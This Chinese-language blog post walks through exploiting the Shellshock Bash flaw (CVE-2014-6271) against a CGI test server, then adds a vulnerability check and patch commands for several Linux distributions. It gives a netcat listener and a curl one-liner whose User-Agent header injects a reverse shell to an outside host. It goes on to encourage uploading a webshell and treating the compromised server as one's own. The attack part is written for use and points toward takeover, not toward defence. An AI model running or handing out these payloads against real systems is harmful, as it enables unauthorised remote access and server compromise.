[Linux安全]CVE-2014-6271 Bash命令执行测试环境

独自等待 2017年5月10日16:17:23评论351 views字数 1258阅读4分11秒阅读模式

最近出了bash命令执行的漏洞,想必大家已经有所耳闻了,但是很多像我一样的小菜不知道怎么测试,还好有大牛帮我们搭建好了测试环境,转载过来大家一起学习研究一下吧。。。此测试环境是习科联创 @夜真灰 牛牛搭建,我已经得到了他的授权,可以转载。。。

关于bash命令执行漏洞的原理,请参考下面的文章:

Bash 3.0-4.3命令执行漏洞分析

CVE-2014-6271测试环境

测试系统为Centos5.9

IP地址为23.239.208.105

没有配置iptables和selinux

cgi poc地址为http://23.239.208.105/cgi-bin/poc.cgi

poc.cgi代码如下

#!/bin/bash
echo "Content-type: text/html"
echo ""
echo ''
echo ''
echo ''
echo 'PoC'
echo ''
echo ''
echo '
'
/usr/bin/env
echo '

'
echo ''
echo ''
exit 0

测试步骤

首先找一个能监听端口的外网ip,Linux和windows都可以,使用nc监听端口12666,我在这里使用linux

nc -l 12666

在一台外网linux主机上执行poc命令(理论上只了联网的应该就可以的)

curl -A "() { :; }; /bin/bash -i > /dev/tcp/xx.xxx.xx.xxx/12666 0<&1 2>&1" http://23.239.208.105/cgi-bin/poc.cgi

就可以将shell反弹出来,那么下面自己找路径,自己wget一个大马上去完全是没有问题的。

bash反弹连接

我已经测试成功了,想必也难不到其它读者的。。。。。

bash命令执行测试环境

bash命令执行测试环境

bash命令执行测试环境

漏洞修补方法:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  

受影响的系统包括:

CentOS
Debian
Redhat
Ubuntu

红帽系可通过更新 bash 并重启系统来解决这个问题:

yum update bash

或者:

yum update bash-4.1.2-15.el6_5.1

此举只是更新了 bash 包,还需要重启系统才能生效。

Ubuntu 用户可以通过如下命令打补丁,无需重启:

apt-get update   
apt-get install bash

另外,据国外可靠消息,打了bash的补丁之后,系统仍然存在bypass的可能。所以我们将继续观望。

服务器如果被提权了,可以任意修改密码,服务器就归你们了。。。

参考文章:

http://drops.wooyun.org/papers/3064

http://bbs.isilic.org/thread-6459-1-1.html

http://www.waitalone.cn/bash-command-exec.html



from www.waitalone.cn.thanks for it.

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月10日16:17:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [Linux安全]CVE-2014-6271 Bash命令执行测试环境https://cn-sec.com/archives/50034.html

发表评论

匿名网友 填写信息